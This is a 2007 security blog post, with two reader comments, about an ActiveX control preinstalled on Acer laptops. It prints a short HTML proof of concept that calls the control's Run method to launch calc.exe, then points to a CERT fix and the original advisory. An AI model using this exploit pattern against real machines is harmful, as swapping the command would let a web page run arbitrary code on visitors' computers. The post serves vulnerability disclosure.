Acer Laptops Pre-Owned

January 08th, 2007 by dk

Update: 17/01 - Solution section

I just read an article on Slashdot that really made be stare!

Discussion:

Pop question hot shot, what do you think this is: 

<html>
<body>
<object classid="clsid:D9998BD0-7957-11D2-8FED-00606730D3A A" id="hahaha">
</object>
<script>
hahaha.Run("c", "\\windows\\system32\\calc.exe", "");
</script>
</html>
</body>

This is proof of concept code (thanks to Koyaanisqatsi). It exploits Acer laptops which have apparently been backdoored with an ActiveX control since 1998.

I wonder how many other hardware and software vendors provide such feature-rich facilities.

Solution:

So if you have an Acer laptop install Linux. If you want to stick with Windows use Firefox because IE (Internet Explorer) is going to get you owned.
A Fix has been provided:
http://www.kb.cert.org/vuls/id/221700

References:

2 Comments so far

  1. pdp @ January 8th, 2007

    I have Acer but the POC doesn’t work

  2. david.kierznowski @ January 8th, 2007

    Some comments have come in saying that it may be regional, but interesting nonetheless. If anyone else has an Acer and gives this a try please keep us posted.

    It looks like “Tan Chew Keong” is responsible for finding this back in November last year. His original advisory here: http://vuln.sg/acerlunchapp-en.html

Leave a reply

Recent

Sponsored links